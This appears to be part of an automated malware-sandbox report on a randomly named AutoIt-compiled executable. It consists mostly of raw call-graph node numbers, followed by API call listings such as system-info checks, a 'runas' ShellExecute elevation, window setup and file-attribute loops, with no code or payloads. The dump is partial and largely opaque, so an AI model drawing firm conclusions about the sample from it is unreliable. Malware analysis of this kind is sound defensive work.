92852->92854 92853->92861 92855 376b5d 92854->92855 92856 3741a6 8 API calls 92855->92856 92857 376b67 92856->92857 92895 37b050 92857->92895 92860 376bfa 3 API calls 92860->92861 92861->92180 92863 376bfa 3 API calls 92862->92863 92864 38fde7 92863->92864 92865 376bfa 3 API calls 92864->92865 92866 38fe08 92865->92866 92866->92160 92868 38c003 92867->92868 92869 38bfc7 92867->92869 92870 37bceb 8 API calls 92868->92870 92869->92868 92871 38bfd6 92869->92871 92879 3dd2ab 92870->92879 92873 38bfeb 92871->92873 92875 38bff8 92871->92875 92872 3dd2da 92872->92174 92902 38c009 92873->92902 92909 3dd3b2 12 API calls 92875->92909 92877 38bff4 92877->92174 92879->92872 92910 3dd249 92879->92910 92917 37acc0 8 API calls __fread_nolock 92879->92917 92881->92185 92882->92186 92883->92190 92884->92142 92885->92142 92887 37b050 2 API calls 92886->92887 92888 3741da 92887->92888 92888->92171 92894 376c11 92889->92894 92890 3b58ec SetFilePointerEx 92891 376c98 SetFilePointerEx SetFilePointerEx 92893 376c64 92891->92893 92892 3b58db 92892->92890 92893->92842 92894->92890 92894->92891 92894->92892 92894->92893 92896 37b0cb 92895->92896 92900 37b05e 92895->92900 92901 38f13c SetFilePointerEx 92896->92901 92898 376b73 92898->92860 92899 37b09c ReadFile 92899->92898 92899->92900 92900->92898 92900->92899 92901->92900 92903 38c1f1 8 API calls 92902->92903 92904 38c021 92903->92904 92918 37adc1 92904->92918 92908 38c03c 92908->92877 92909->92877 92911 3dd26a 92910->92911 92912 3dd253 92910->92912 92914 37b050 2 API calls 92911->92914 92912->92911 92913 3dd259 92912->92913 92915 37b050 2 API calls 92913->92915 92916 3dd263 92914->92916 92915->92916 92916->92879 92917->92879 92932 38feaa 92918->92932 92920 37add2 92921 37b050 2 API calls 92920->92921 92922 37ae07 92920->92922 92939 37b0e3 8 API calls __fread_nolock 92920->92939 92921->92920 92922->92908 92924 378774 MultiByteToWideChar 92922->92924 92925 3787e7 92924->92925 92926 3787a0 92924->92926 92928 37bceb 8 API calls 92925->92928 
92927 39019b 8 API calls 92926->92927 92929 3787b5 MultiByteToWideChar 92927->92929 92931 3787db 92928->92931 92940 3787f0 92929->92940 92931->92908 92933 38febb 92932->92933 92934 3cfe13 92932->92934 92933->92920 92935 39016b 8 API calls 92934->92935 92936 3cfe1d 92935->92936 92937 39019b 8 API calls 92936->92937 92938 3cfe32 92937->92938 92939->92920 92941 378884 92940->92941 92942 378803 92940->92942 92943 3796d9 8 API calls 92941->92943 92942->92941 92945 37880f 92942->92945 92944 378821 __fread_nolock 92943->92944 92944->92931 92946 378847 92945->92946 92947 378819 92945->92947 92948 39016b 8 API calls 92946->92948 92952 378894 8 API calls 92947->92952 92950 378851 92948->92950 92951 39019b 8 API calls 92950->92951 92951->92944 92952->92944 92954 37bf07 8 API calls 92953->92954 92955 3dd853 92954->92955 92956 37bf07 8 API calls 92955->92956 92957 3dd85b 92956->92957 92958 37bf07 8 API calls 92957->92958 92959 3dd863 92958->92959 92960 37557e 9 API calls 92959->92960 92961 3dd86d 92960->92961 92962 37557e 9 API calls 92961->92962 92963 3dd877 92962->92963 92999 3de958 92963->92999 92965 3dd882 92966 3de9c5 GetFileAttributesW 92965->92966 92967 3dd88d 92966->92967 92968 3dd89f 92967->92968 92969 3765a4 8 API calls 92967->92969 92970 3de9c5 GetFileAttributesW 92968->92970 92969->92968 92971 3dd8a7 92970->92971 92972 3dd8b4 92971->92972 92974 3765a4 8 API calls 92971->92974 92973 37bf07 8 API calls 92972->92973 92975 3dd8bc 92973->92975 92974->92972 92976 37bf07 8 API calls 92975->92976 92977 3dd8c4 92976->92977 92978 37694e 8 API calls 92977->92978 92979 3dd8d5 FindFirstFileW 92978->92979 92980 3dda23 FindClose 92979->92980 92992 3dd8f8 92979->92992 92992->92980 92997 3de387 4 API calls 92996->92997 92998 3ddc95 92997->92998 92998->92215 92998->92219 93000 37bf07 8 API calls 92999->93000 93001 3de96d 93000->93001 93002 37bf07 8 API calls 93001->93002 93003 3de975 93002->93003 93004 37694e 8 API calls 93003->93004 93005 3de984 93004->93005 93006 37694e 8 API calls 
93005->93006 93007 3de994 93006->93007 93008 38e2e5 41 API calls 93007->93008 93009 3de9a9 93008->93009 93009->92965 93067 3b22f0 __wsopen_s 93066->93067 93068 3de790 GetShortPathNameW 93067->93068 93069 3784b7 8 API calls 93068->93069 93070 3de7b8 93069->93070 93070->92232 93070->92234 93071->91845 93072->91845 93073->91844 93074->91848 93075 3a8792 93080 3a854e 93075->93080 93078 3a87ba 93085 3a857f try_get_first_available_module 93080->93085 93082 3a877e 93104 3a2b7c 26 API calls __cftof 93082->93104 93084 3a86d3 93084->93078 93092 3b0d24 93084->93092 93091 3a86c8 93085->93091 93095 39919b 93085->93095 93088 39919b 40 API calls 93089 3a873b 93088->93089 93090 39919b 40 API calls 93089->93090 93089->93091 93090->93091 93091->93084 93103 39f669 20 API calls _free 93091->93103 93108 3b0421 93092->93108 93094 3b0d3f 93094->93078 93096 39923b 93095->93096 93098 3991af 93095->93098 93107 399253 40 API calls 2 library calls 93096->93107 93100 3991d1 93098->93100 93105 39f669 20 API calls _free 93098->93105 93100->93088 93100->93091 93101 3991c6 93106 3a2b7c 26 API calls __cftof 93101->93106 93103->93082 93104->93084 93105->93101 93106->93100 93107->93100 93111 3b042d ___DestructExceptionObject 93108->93111 93109 3b043b 93165 39f669 20 API calls _free 93109->93165 93111->93109 93113 3b0474 93111->93113 93112 3b0440 93166 3a2b7c 26 API calls __cftof 93112->93166 93119 3b09fb 93113->93119 93118 3b044a __wsopen_s 93118->93094 93120 3b0a18 93119->93120 93121 3b0a2d 93120->93121 93122 3b0a46 93120->93122 93182 39f656 20 API calls _free 93121->93182 93168 3a55b1 93122->93168 93125 3b0a4b 93126 3b0a6b 93125->93126 93127 3b0a54 93125->93127 93181 3b073a CreateFileW 93126->93181 93184 39f656 20 API calls _free 93127->93184 93131 3b0a59 93185 39f669 20 API calls _free 93131->93185 93133 3b0b21 GetFileType 93135 3b0b2c GetLastError 93133->93135 93140 3b0b73 93133->93140 93134 3b0af6 GetLastError 93187 39f633 20 API calls 2 library calls 93134->93187 93188 39f633 20 API calls 2 
library calls 93135->93188 93137 3b0aa4 93137->93133 93137->93134 93186 3b073a CreateFileW 93137->93186 93139 3b0b3a CloseHandle 93142 3b0a32 93139->93142 93143 3b0b63 93139->93143 93190 3a54fa 21 API calls 3 library calls 93140->93190 93183 39f669 20 API calls _free 93142->93183 93189 39f669 20 API calls _free 93143->93189 93145 3b0ae9 93145->93133 93145->93134 93147 3b0b94 93149 3b0be0 93147->93149 93191 3b094b 72 API calls 4 library calls 93147->93191 93148 3b0b68 93148->93142 93154 3b0c0d 93149->93154 93192 3b04ed 72 API calls 3 library calls 93149->93192 93152 3b0c06 93153 3b0c1e 93152->93153 93152->93154 93156 3b0498 93153->93156 93157 3b0c9c CloseHandle 93153->93157 93193 3a8a3e 93154->93193 93167 3b04c1 LeaveCriticalSection __wsopen_s 93156->93167 93208 3b073a CreateFileW 93157->93208 93159 3b0cc7 93160 3b0cfd 93159->93160 93161 3b0cd1 GetLastError 93159->93161 93160->93156 93209 39f633 20 API calls 2 library calls 93161->93209 93163 3b0cdd 93210 3a56c3 21 API calls 3 library calls 93163->93210 93165->93112 93166->93118 93167->93118 93169 3a55bd ___DestructExceptionObject 93168->93169 93211 3a32ee EnterCriticalSection 93169->93211 93171 3a55e9 93215 3a5390 93171->93215 93174 3a5634 __wsopen_s 93174->93125 93175 3a55c4 93175->93171 93177 3a5657 EnterCriticalSection 93175->93177 93179 3a560b 93175->93179 93178 3a5664 LeaveCriticalSection 93177->93178 93177->93179 93178->93175 93212 3a56ba 93179->93212 93181->93137 93182->93142 93183->93156 93184->93131 93185->93142 93186->93145 93187->93142 93188->93139 93189->93148 93190->93147 93191->93149 93192->93152 93241 3a5754 93193->93241 93195 3a8a54 93254 3a56c3 21 API calls 3 library calls 93195->93254 93197 3a8a4e 93197->93195 93198 3a5754 __wsopen_s 26 API calls 93197->93198 93207 3a8a86 93197->93207 93203 3a8a7d 93198->93203 93199 3a5754 __wsopen_s 26 API calls 93200 3a8a92 CloseHandle 93199->93200 93200->93195 93204 3a8a9e GetLastError 93200->93204 93201 3a8aac 93202 3a8ace 93201->93202 93255 39f633 20 API 
calls 2 library calls 93201->93255 93202->93156 93206 3a5754 __wsopen_s 26 API calls 93203->93206 93204->93195 93206->93207 93207->93195 93207->93199 93208->93159 93209->93163 93210->93160 93211->93175 93223 3a3336 LeaveCriticalSection 93212->93223 93214 3a56c1 93214->93174 93224 3a500d 93215->93224 93217 3a53af 93232 3a2d58 93217->93232 93218 3a53a2 93218->93217 93231 3a3795 11 API calls 2 library calls 93218->93231 93221 3a5401 93221->93179 93222 3a54d7 EnterCriticalSection 93221->93222 93222->93179 93223->93214 93229 3a501a CallUnexpected 93224->93229 93225 3a505a 93239 39f669 20 API calls _free 93225->93239 93226 3a5045 RtlAllocateHeap 93228 3a5058 93226->93228 93226->93229 93228->93218 93229->93225 93229->93226 93238 39523d 7 API calls 2 library calls 93229->93238 93231->93218 93233 3a2d63 RtlFreeHeap 93232->93233 93237 3a2d8c _free 93232->93237 93234 3a2d78 93233->93234 93233->93237 93240 39f669 20 API calls _free 93234->93240 93236 3a2d7e GetLastError 93236->93237 93237->93221 93238->93229 93239->93228 93240->93236 93242 3a5761 93241->93242 93243 3a5776 93241->93243 93256 39f656 20 API calls _free 93242->93256 93249 3a579b 93243->93249 93258 39f656 20 API calls _free 93243->93258 93246 3a5766 93257 39f669 20 API calls _free 93246->93257 93247 3a57a6 93259 39f669 20 API calls _free 93247->93259 93249->93197 93251 3a576e 93251->93197 93252 3a57ae 93260 3a2b7c 26 API calls __cftof 93252->93260 93254->93201 93255->93202 93256->93246 93257->93251 93258->93247 93259->93252 93260->93251 93261 3c55f4 93270 38e34f 93261->93270 93263 3c560a 93265 3c5685 93263->93265 93279 38a9e5 9 API calls 93263->93279 93268 3c617b 93265->93268 93281 3e3ef6 81 API calls __wsopen_s 93265->93281 93267 3c5665 93267->93265 93280 3e2393 8 API calls 93267->93280 93271 38e35d 93270->93271 93272 38e370 93270->93272 93273 37b3fe 8 API calls 93271->93273 93274 38e3a3 93272->93274 93275 38e375 93272->93275 93278 38e367 93273->93278 93277 37b3fe 8 API calls 93274->93277 93276 39016b 8 API calls 
93275->93276 93276->93278 93277->93278 93278->93263 93279->93267 93280->93265 93281->93268 93282 37367c 93285 373696 93282->93285 93286 3736ad 93285->93286 93287 3736b2 93286->93287 93288 373711 93286->93288 93326 37370f 93286->93326 93292 3736bf 93287->93292 93293 37378b PostQuitMessage 93287->93293 93290 373717 93288->93290 93291 3b3dce 93288->93291 93289 3736f6 DefWindowProcW 93315 373690 93289->93315 93295 373743 SetTimer RegisterWindowMessageW 93290->93295 93296 37371e 93290->93296 93341 372f24 10 API calls 93291->93341 93297 3b3e3b 93292->93297 93298 3736ca 93292->93298 93293->93315 93303 37376c CreatePopupMenu 93295->93303 93295->93315 93301 373727 KillTimer 93296->93301 93302 3b3d6f 93296->93302 93346 3dc80c 65 API calls ___scrt_fastfail 93297->93346 93304 373795 93298->93304 93305 3736d4 93298->93305 93300 3b3def 93342 38f1c6 40 API calls 93300->93342 93337 37388e Shell_NotifyIconW ___scrt_fastfail 93301->93337 93310 3b3daa MoveWindow 93302->93310 93311 3b3d74 93302->93311 93303->93315 93330 38fcbb 93304->93330 93306 3736df 93305->93306 93319 3b3e20 93305->93319 93313 3736ea 93306->93313 93314 373779 93306->93314 93307 3b3e4d 93307->93289 93307->93315 93310->93315 93316 3b3d7a 93311->93316 93317 3b3d99 SetFocus 93311->93317 93313->93289 93343 37388e Shell_NotifyIconW ___scrt_fastfail 93313->93343 93339 3737a6 75 API calls ___scrt_fastfail 93314->93339 93316->93313 93321 3b3d83 93316->93321 93317->93315 93318 37373a 93338 37572c DeleteObject DestroyWindow 93318->93338 93319->93289 93345 3d1367 8 API calls 93319->93345 93340 372f24 10 API calls 93321->93340 93324 373789 93324->93315 93326->93289 93328 3b3e14 93344 3738f2 60 API calls ___scrt_fastfail 93328->93344 93331 38fd59 93330->93331 93332 38fcd3 ___scrt_fastfail 93330->93332 93331->93315 93347 375f59 93332->93347 93334 38fd42 KillTimer SetTimer 93334->93331 93335 38fcfa 93335->93334 93336 3cfdcb Shell_NotifyIconW 93335->93336 93336->93334 93337->93318 93338->93315 93339->93324 93340->93315 93341->93300 
93342->93313 93343->93328 93344->93326 93345->93326 93346->93307 93348 375f76 93347->93348 93349 376058 93347->93349 93350 377a14 8 API calls 93348->93350 93349->93335 93351 375f84 93350->93351 93352 375f91 93351->93352 93353 3b5101 LoadStringW 93351->93353 93354 3784b7 8 API calls 93352->93354 93356 3b511b 93353->93356 93355 375fa6 93354->93355 93357 375fb3 93355->93357 93364 3b5137 93355->93364 93359 37be6d 8 API calls 93356->93359 93362 375fd9 ___scrt_fastfail 93356->93362 93357->93356 93358 375fbd 93357->93358 93360 3765a4 8 API calls 93358->93360 93359->93362 93361 375fcb 93360->93361 93363 377af4 8 API calls 93361->93363 93366 37603e Shell_NotifyIconW 93362->93366 93363->93362 93364->93362 93365 3b517a 93364->93365 93367 37bf07 8 API calls 93364->93367 93378 38fe8f 51 API calls 93365->93378 93366->93349 93368 3b5161 93367->93368 93377 3da265 9 API calls 93368->93377 93371 3b5199 93373 3765a4 8 API calls 93371->93373 93372 3b516c 93374 377af4 8 API calls 93372->93374 93375 3b51aa 93373->93375 93374->93365 93376 3765a4 8 API calls 93375->93376 93376->93362 93377->93372 93378->93371 93379 37105b 93384 37522e 93379->93384 93381 37106a 93415 390433 29 API calls __onexit 93381->93415 93383 371074 93385 37523e __wsopen_s 93384->93385 93386 37bf07 8 API calls 93385->93386 93387 3752f4 93386->93387 93416 37551b 93387->93416 93389 3752fd 93423 3751bf 93389->93423 93392 3765a4 8 API calls 93393 375316 93392->93393 93429 37684e 93393->93429 93396 37bf07 8 API calls 93397 37532e 93396->93397 93398 37bceb 8 API calls 93397->93398 93399 375337 RegOpenKeyExW 93398->93399 93400 3b4bc0 RegQueryValueExW 93399->93400 93404 375359 93399->93404 93401 3b4bdd 93400->93401 93402 3b4c56 RegCloseKey 93400->93402 93403 39019b 8 API calls 93401->93403 93402->93404 93414 3b4c68 _wcslen 93402->93414 93405 3b4bf6 93403->93405 93404->93381 93406 3741a6 8 API calls 93405->93406 93407 3b4c01 RegQueryValueExW 93406->93407 93408 3b4c1e 93407->93408 93411 3b4c38 messages 93407->93411 93409 3784b7 
8 API calls 93408->93409 93409->93411 93410 37627c 8 API calls 93410->93414 93411->93402 93412 37b25f 8 API calls 93412->93414 93413 37684e 8 API calls 93413->93414 93414->93404 93414->93410 93414->93412 93414->93413 93415->93383 93417 3b22f0 __wsopen_s 93416->93417 93418 375528 GetModuleFileNameW 93417->93418 93419 37b25f 8 API calls 93418->93419 93420 37554e 93419->93420 93421 37557e 9 API calls 93420->93421 93422 375558 93421->93422 93422->93389 93424 3b22f0 __wsopen_s 93423->93424 93425 3751cc GetFullPathNameW 93424->93425 93426 3751ee 93425->93426 93427 3784b7 8 API calls 93426->93427 93428 37520c 93427->93428 93428->93392 93430 37685d 93429->93430 93434 37687e __fread_nolock 93429->93434 93432 39019b 8 API calls 93430->93432 93431 39016b 8 API calls 93433 375325 93431->93433 93432->93434 93433->93396 93434->93431 93435 371098 93440 375d78 93435->93440 93439 3710a7 93441 37bf07 8 API calls 93440->93441 93442 375d8f GetVersionExW 93441->93442 93443 3784b7 8 API calls 93442->93443 93444 375ddc 93443->93444 93445 3796d9 8 API calls 93444->93445 93447 375e12 93444->93447 93446 375e06 93445->93446 93449 3779ed 8 API calls 93446->93449 93448 375ecc GetCurrentProcess IsWow64Process 93447->93448 93455 3b50ad 93447->93455 93450 375ee8 93448->93450 93449->93447 93451 375f00 LoadLibraryA 93450->93451 93452 3b50f2 GetSystemInfo 93450->93452 93453 375f11 GetProcAddress 93451->93453 93454 375f4d GetSystemInfo 93451->93454 93453->93454 93456 375f21 GetNativeSystemInfo 93453->93456 93457 375f27 93454->93457 93456->93457 93458 37109d 93457->93458 93459 375f2b FreeLibrary 93457->93459 93460 390433 29 API calls __onexit 93458->93460 93459->93458 93460->93439 93461 3c506e 93473 37f7b0 messages 93461->93473 93462 3e3ef6 81 API calls 93462->93473 93464 381c50 8 API calls 93464->93473 93466 37bf07 8 API calls 93466->93473 93468 37be6d 8 API calls 93468->93473 93471 37fa91 93472 3802f0 254 API calls 93472->93473 93473->93462 93473->93464 93473->93466 93473->93468 93473->93471 
93473->93472 93476 37bdc1 93473->93476 93480 38b2d6 254 API calls 93473->93480 93481 3905d2 5 API calls __Init_thread_wait 93473->93481 93482 390433 29 API calls __onexit 93473->93482 93483 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93473->93483 93484 3f5131 101 API calls 93473->93484 93485 3f721e 254 API calls 93473->93485 93477 37bdcc 93476->93477 93478 37bdfb 93477->93478 93486 37bf39 93477->93486 93478->93473 93480->93473 93481->93473 93482->93473 93483->93473 93484->93473 93485->93473 93503 37cf30 93486->93503 93488 37bf49 93489 37bf57 93488->93489 93490 3c0d59 93488->93490 93492 39016b 8 API calls 93489->93492 93491 37b3fe 8 API calls 93490->93491 93493 3c0d64 93491->93493 93494 37bf68 93492->93494 93495 37bf07 8 API calls 93494->93495 93496 37bf72 93495->93496 93497 37bf81 93496->93497 93498 37be6d 8 API calls 93496->93498 93499 39016b 8 API calls 93497->93499 93498->93497 93500 37bf8b 93499->93500 93511 37be0f 39 API calls 93500->93511 93502 37bfaf 93502->93478 93504 37d177 93503->93504 93509 37cf43 93503->93509 93504->93488 93506 37cfed 93506->93488 93507 37bf07 8 API calls 93507->93509 93509->93506 93509->93507 93512 3905d2 5 API calls __Init_thread_wait 93509->93512 93513 390433 29 API calls __onexit 93509->93513 93514 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 93509->93514 93511->93502 93512->93509 93513->93509 93514->93509 93515 3c3bae 93536 3dc72e 93515->93536 93517 3c3bb8 93519 3c3be3 93517->93519 93520 3dc72e Sleep 93517->93520 93525 37ef8b 93517->93525 93542 38a9e5 9 API calls 93517->93542 93521 37b25f 8 API calls 93519->93521 93520->93517 93522 3c3c13 93521->93522 93523 37bf39 39 API calls 93522->93523 93524 3c3c2f 93523->93524 93543 3e4384 8 API calls 93524->93543 93529 37f400 93525->93529 93528 37f047 93530 37f433 93529->93530 93531 37f41f 93529->93531 93576 3e3ef6 81 API calls __wsopen_s 93530->93576 93544 37e910 93531->93544 93534 37f42a 93534->93528 93535 3c4528 93535->93535 93537 3dc739 
93536->93537 93538 3dc754 93536->93538 93537->93517 93539 3dc782 93538->93539 93540 3dc766 Sleep 93538->93540 93539->93517 93540->93539 93542->93517 93543->93528 93545 3802f0 254 API calls 93544->93545 93556 37e94d 93545->93556 93546 3c3176 93583 3e3ef6 81 API calls __wsopen_s 93546->93583 93548 37e9bb messages 93548->93534 93549 37ed85 93549->93548 93558 39019b 8 API calls 93549->93558 93550 37ea73 93550->93549 93552 37ea7e 93550->93552 93551 37ecaf 93554 37ecc4 93551->93554 93555 3c3167 93551->93555 93553 39016b 8 API calls 93552->93553 93566 37ea85 __fread_nolock 93553->93566 93559 39016b 8 API calls 93554->93559 93582 3f6062 8 API calls 93555->93582 93556->93546 93556->93548 93556->93549 93556->93550 93557 37eb68 93556->93557 93564 39016b 8 API calls 93556->93564 93571 37ead9 __fread_nolock messages 93556->93571 93561 39019b 8 API calls 93557->93561 93558->93566 93568 37eb1a 93559->93568 93561->93571 93562 39016b 8 API calls 93563 37eaa6 93562->93563 93563->93571 93577 37d210 254 API calls 93563->93577 93564->93556 93566->93562 93566->93563 93567 3c3156 93581 3e3ef6 81 API calls __wsopen_s 93567->93581 93568->93534 93571->93551 93571->93567 93571->93568 93572 3c3131 93571->93572 93574 3c310f 93571->93574 93578 374485 254 API calls 93571->93578 93580 3e3ef6 81 API calls __wsopen_s 93572->93580 93579 3e3ef6 81 API calls __wsopen_s 93574->93579 93576->93535 93577->93571 93578->93571 93579->93568 93580->93568 93581->93568 93582->93546 93583->93548 93584 39078b 93585 390797 ___DestructExceptionObject 93584->93585 93614 390241 93585->93614 93587 39079e 93588 3908f1 93587->93588 93591 3907c8 93587->93591 93655 390bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 93588->93655 93590 3908f8 93648 3951e2 93590->93648 93600 390807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 93591->93600 93625 3a280d 93591->93625 93598 3907e7 93605 390868 93600->93605 93651 3951aa 38 API calls 3 
library calls 93600->93651 93602 39086e 93637 3732a2 93602->93637 93633 390ce9 93605->93633 93608 39088a 93608->93590 93609 39088e 93608->93609 93610 390897 93609->93610 93653 395185 28 API calls _abort 93609->93653 93654 3903d0 13 API calls 2 library calls 93610->93654 93613 39089f 93613->93598 93615 39024a 93614->93615 93657 390a28 IsProcessorFeaturePresent 93615->93657 93617 390256 93658 393024 10 API calls 3 library calls 93617->93658 93619 39025b 93624 39025f 93619->93624 93659 3a26a7 93619->93659 93622 390276 93622->93587 93624->93587 93626 3a2824 93625->93626 93627 390e1c _ValidateLocalCookies 5 API calls 93626->93627 93628 3907e1 93627->93628 93628->93598 93629 3a27b1 93628->93629 93631 3a27e0 93629->93631 93630 390e1c _ValidateLocalCookies 5 API calls 93632 3a2809 93630->93632 93631->93630 93632->93600 93710 3926d0 93633->93710 93636 390d0f 93636->93602 93638 3732ae IsThemeActive 93637->93638 93639 373309 93637->93639 93712 3952d3 93638->93712 93652 390d22 GetModuleHandleW 93639->93652 93641 3732d9 93718 395339 93641->93718 93643 3732e0 93725 37326d SystemParametersInfoW SystemParametersInfoW 93643->93725 93645 3732e7 93726 373312 93645->93726 94590 394f5f 93648->94590 93651->93605 93652->93608 93653->93610 93654->93613 93655->93590 93657->93617 93658->93619 93663 3ad596 93659->93663 93662 39304d 8 API calls 3 library calls 93662->93624 93666 3ad5b3 93663->93666 93667 3ad5af 93663->93667 93665 390268 93665->93622 93665->93662 93666->93667 93669 3a4f8b 93666->93669 93681 390e1c 93667->93681 93670 3a4f97 ___DestructExceptionObject 93669->93670 93688 3a32ee EnterCriticalSection 93670->93688 93672 3a4f9e 93689 3a543f 93672->93689 93674 3a4fad 93675 3a4fbc 93674->93675 93702 3a4e1f 29 API calls 93674->93702 93704 3a4fd8 LeaveCriticalSection _abort 93675->93704 93678 3a4fb7 93703 3a4ed5 GetStdHandle GetFileType 93678->93703 93679 3a4fcd __wsopen_s 93679->93666 93682 390e25 93681->93682 93683 390e27 IsProcessorFeaturePresent 93681->93683 93682->93665 93685 390fee 

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00375DA7
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                • GetCurrentProcess.KERNEL32(?,0040DC2C,00000000,?,?), ref: 00375ED3
                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00375EDA
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00375F05
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00375F17
                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00375F25
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00375F2C
                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 00375F51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                • API String ID: 3290436268-3101561225
                                                • Opcode ID: d20af4b4669c3bb5178da307f383c2d3226cc00cead4d32c1b5850ab154ae6b5
                                                • Instruction ID: 8616baec45a7be5ba0cdbd5bc393695074963b37228c463c2e2dbbaf19c4d907
                                                • Opcode Fuzzy Hash: d20af4b4669c3bb5178da307f383c2d3226cc00cead4d32c1b5850ab154ae6b5
                                                • Instruction Fuzzy Hash: 30A1953A8196C0CFC726CF797E401D97FB46B27304B8498B9F94597622C6EC4558CB2D

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,003732EF,?), ref: 00373342
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,003732EF,?), ref: 00373355
                                                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00442418,00442400,?,?,?,?,?,?,003732EF,?), ref: 003733C1
                                                  • Part of subcall function 003784B7: _wcslen.LIBCMT ref: 003784CA
                                                  • Part of subcall function 003741E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,003733E9,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00374227
                                                • SetCurrentDirectoryW.KERNELBASE(?,00000001,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 00373442
                                                • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 003B3C8A
                                                • SetCurrentDirectoryW.KERNEL32(?,00442418,?,?,?,?,?,?,?,003732EF,?), ref: 003B3CCB
                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004331F4,00442418,?,?,?,?,?,?,?,003732EF), ref: 003B3D54
                                                • ShellExecuteW.SHELL32(00000000,?,?), ref: 003B3D5B
                                                  • Part of subcall function 0037345A: GetSysColorBrush.USER32(0000000F), ref: 00373465
                                                  • Part of subcall function 0037345A: LoadCursorW.USER32(00000000,00007F00), ref: 00373474
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(00000063), ref: 0037348A
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(000000A4), ref: 0037349C
                                                  • Part of subcall function 0037345A: LoadIconW.USER32(000000A2), ref: 003734AE
                                                  • Part of subcall function 0037345A: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003734C6
                                                  • Part of subcall function 0037345A: RegisterClassExW.USER32(?), ref: 00373517
                                                  • Part of subcall function 0037353A: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00373568
                                                  • Part of subcall function 0037353A: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00373589
                                                  • Part of subcall function 0037353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 0037359D
                                                  • Part of subcall function 0037353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,003732EF,?), ref: 003735A6
                                                  • Part of subcall function 003738F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003739C3
                                                Strings
                                                • 0$D, xrefs: 0037341C
                                                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 003B3C84
                                                • runas, xrefs: 003B3D4F
                                                • AutoIt, xrefs: 003B3C7F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                • String ID: 0$D$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                • API String ID: 683915450-319202188
                                                • Opcode ID: cee5de3dd18bc0ec410063b21128163c48ee95d773fcb06601efc498db878d5f
                                                • Instruction ID: 9bb1cac8d8e235840261d6f7a31a92e932e44c590ecd534939df97d0d653a26c
                                                • Opcode Fuzzy Hash: cee5de3dd18bc0ec410063b21128163c48ee95d773fcb06601efc498db878d5f
                                                • Instruction Fuzzy Hash: 76512870108341AAD727EF60DD05ABE7BB8DF85714F80843DF4895A1A2CB7C8A4DD726

                                                Control-flow Graph

                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,74DE8FB0,?,00000000), ref: 003E9FC0
                                                • GetFileAttributesW.KERNELBASE(?), ref: 003E9FFE
                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 003EA018
                                                • FindNextFileW.KERNELBASE(00000000,?), ref: 003EA030
